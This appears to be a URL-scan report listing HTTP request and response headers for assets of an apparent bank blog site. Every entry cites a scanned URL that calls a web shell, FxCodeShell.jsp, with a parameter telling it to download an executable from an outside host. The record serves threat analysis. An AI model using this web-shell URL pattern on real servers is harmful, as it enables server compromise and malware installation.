URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

2be7477cc78c422582ae9cf9466c72a7769b807aa16a5bf2b162708ca36e11ec

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 8490
X-XSS-Protection: 1
Last-Modified: Tue, 14 Feb 2017 15:18:06 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "deae15e"
Vary: Accept-Encoding
Content-Type: application/javascript
Cache-Control: max-age=315360000, public
Set-Cookie: JSESSIONID=84F79F6DA0CC82EBBF9E9F6E3DD6C1A3; Path=/bl-blog-theme/; Secure; HttpOnly
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=98

GET
H/1.1 200
OK Cookie set jquery.fancybox-media.min.js Show response
193.178.219.134/bl-blog-theme/js/fancybox/helpers/ 2 KB
2 KB 277ms
39ms Script
application/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/js/fancybox/helpers/jquery.fancybox-media.min.js

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

0c94eeab9c5d115290928dc922c13810c9aa10001aba3d1ef91215883ddebdb5

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 1053
X-XSS-Protection: 1
Last-Modified: Tue, 14 Feb 2017 15:18:06 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "4394e457"
Vary: Accept-Encoding
Content-Type: application/javascript
Cache-Control: max-age=315360000, public
Set-Cookie: JSESSIONID=D7979ABA4DBEC405D41E8F3D0FD8644A; Path=/bl-blog-theme/; Secure; HttpOnly
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=98

GET
H/1.1 200
OK aui.css
193.178.219.134/bl-blog-theme/css/ 164 KB
27 KB 149ms
105ms Stylesheet
text/css 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/css/aui.css?browserId=other&themeId=blblog_WAR_blblogtheme&minifierType=css&languageId=en_US&b=6205&t=1517466262971

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

4d00df175e1d63fb82c37aa7ce214521fc94b2cc975db9ec260c2afd0a0153e4

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/css,*/*;q=0.1
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 26951
X-XSS-Protection: 1
Last-Modified: Thu, 01 Feb 2018 06:24:22 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "1f7e5216"
Vary: Accept-Encoding
Content-Type: text/css
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=100

GET
H/1.1 200
OK main.css
193.178.219.134/html/css/ 119 KB
20 KB 155ms
110ms Stylesheet
text/css 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/html/css/main.css?browserId=other&themeId=blblog_WAR_blblogtheme&minifierType=css&languageId=en_US&b=6205&t=1452605784000

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

ebf6b6b0f224b7d33dd0a33f05f3184f20c8eda7316cc2ab5ac98a31a920749f

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/css,*/*;q=0.1
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 19808
X-XSS-Protection: 1
Last-Modified: Tue, 12 Jan 2016 13:36:24 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "dbc1aa9a"
Vary: Accept-Encoding
Content-Type: text/css
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=100
Expires: Wed, 04 Apr 2029 15:50:43 GMT

GET
H/1.1 200
OK main.css
193.178.219.134/html/portlet/journal_content/css/ 845 B
876 B 149ms
105ms Stylesheet
text/css 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/html/portlet/journal_content/css/main.css?browserId=other&themeId=blblog_WAR_blblogtheme&minifierType=css&languageId=en_US&b=6205&t=1553406119463

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

85c58b63a0e663c83ccc2c4321cffdec5230f994d86447b7f94084119f161655

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/css,*/*;q=0.1
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 313
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:59 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "bb7f482f"
Vary: Accept-Encoding
Content-Type: text/css
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=100
Expires: Wed, 04 Apr 2029 15:50:43 GMT

GET
H/1.1 200
OK main.css
193.178.219.134/notifications-portlet/notifications/css/ 17 KB
3 KB 134ms
90ms Stylesheet
text/css 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/notifications-portlet/notifications/css/main.css?browserId=other&themeId=blblog_WAR_blblogtheme&minifierType=css&languageId=en_US&b=6205&t=1553406116748

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

271e12ee0f65c85124290c87dda1507f81e5e31476dc6c31be54206646bf2540

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/css,*/*;q=0.1
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 2060
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:56 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "af8c6706"
Vary: Accept-Encoding
Content-Type: text/css
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=100

GET
H/1.1 200
OK barebone.jsp Show response
193.178.219.134/html/js/ 403 KB
121 KB 421ms
187ms Script
text/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/html/js/barebone.jsp?browserId=other&themeId=blblog_WAR_blblogtheme&colorSchemeId=bli&minifierType=js&minifierBundleId=javascript.barebone.files&languageId=en_US&b=6205&t=1553406106270

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

ec5f1532c84858c293c4909c0d0db436b95de6d60be2f2e71dcabe7e2cc71111

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 123322
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:46 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "4e4d976c"
Vary: Accept-Encoding
Content-Type: text/javascript
Cache-Control: max-age=315360000, no-cache="Set-Cookie", public
Keep-Alive: timeout=15, max=96
Expires: Wed, 04 Apr 2029 15:50:43 GMT

GET
H/1.1 200
OK main.css
193.178.219.134/bl-blog-theme/css/ 225 KB
70 KB 167ms
66ms Stylesheet
text/css 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/css/main.css?browserId=other&themeId=blblog_WAR_blblogtheme&minifierType=css&languageId=en_US&b=6205&t=1517466262971

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

5a0c41dabbf6518fd530918c761078a88c6c1f8fb0a3abdb5d5715da13fcfe4d

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/css,*/*;q=0.1
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 70811
X-XSS-Protection: 1
Last-Modified: Thu, 01 Feb 2018 06:24:22 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "fcf7687f"
Vary: Accept-Encoding
Content-Type: text/css
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=97

GET
H/1.1 200
OK Cookie set jquery.cookie.min.js Show response
193.178.219.134/bl-blog-theme/js/ 1 KB
1 KB 274ms
42ms Script
application/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/js/jquery.cookie.min.js

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

a95f4875531b12642d2ef720c592e2ed845d57cc846f0386147e6ab24a268e3a

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 667
X-XSS-Protection: 1
Last-Modified: Tue, 14 Feb 2017 15:18:06 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "e3beea55"
Vary: Accept-Encoding
Content-Type: application/javascript
Cache-Control: max-age=315360000, public
Set-Cookie: JSESSIONID=C7012681583F030784BDCB7E0E838998; Path=/bl-blog-theme/; Secure; HttpOnly
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99

GET
H/1.1 200
OK 245cd1c4-cb6d-441c-8d8a-6616728f728a
193.178.219.134/documents/19625/43120/logo_bli.png/ 6 KB
6 KB 177ms
177ms Image
image/png 193.178.219.134

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://193.178.219.134/documents/19625/43120/logo_bli.png/245cd1c4-cb6d-441c-8d8a-6616728f728a?t=1453304337191

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

d3c013517eb33ed0573e66c9d44236c8ca8d205fe1a1fe8bf2bfa9954b30dc04

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Last-Modified: Fri, 08 Dec 2017 08:35:57 GMT
Server: Apache-Coyote/1.1
Date: Sun, 07 Apr 2019 15:50:43 GMT
X-Frame-Options: SAMEORIGIN SAMEORIGIN
Content-Type: image/png
Cache-Control: private
Content-Disposition: inline; filename="logo_bli.png"
Connection: Keep-Alive
Keep-Alive: timeout=15, max=97
Content-Length: 5958
X-XSS-Protection: 1

GET
H/1.1 200
OK main.js Show response
193.178.219.134/notifications-portlet/notifications/js/ 11 KB
3 KB 56ms
55ms Script
text/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/notifications-portlet/notifications/js/main.js?browserId=other&minifierType=js&languageId=en_US&b=6205&t=1553406116748

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

0ff2726ec7c599489cee32c064377b257c55c0816073f29a0e8156f0652f7ff2

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 2618
X-XSS-Protection: 1
Last-Modified: Sun, 24 Mar 2019 05:41:56 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "bd3cb0be"
Vary: Accept-Encoding
Content-Type: text/javascript
Cache-Control: max-age=315360000, public
Keep-Alive: timeout=15, max=98

GET
H/1.1 200
OK main.js Show response
193.178.219.134/bl-blog-theme/js/ 3 KB
2 KB 48ms
47ms Script
text/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/js/main.js?browserId=other&minifierType=js&languageId=en_US&b=6205&t=1517466262971

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

f7cb87b3b874204510782eb5e0eb0c8a0b66b4c2bd6191b56908e624d6048436

Security Headers

Name	Value
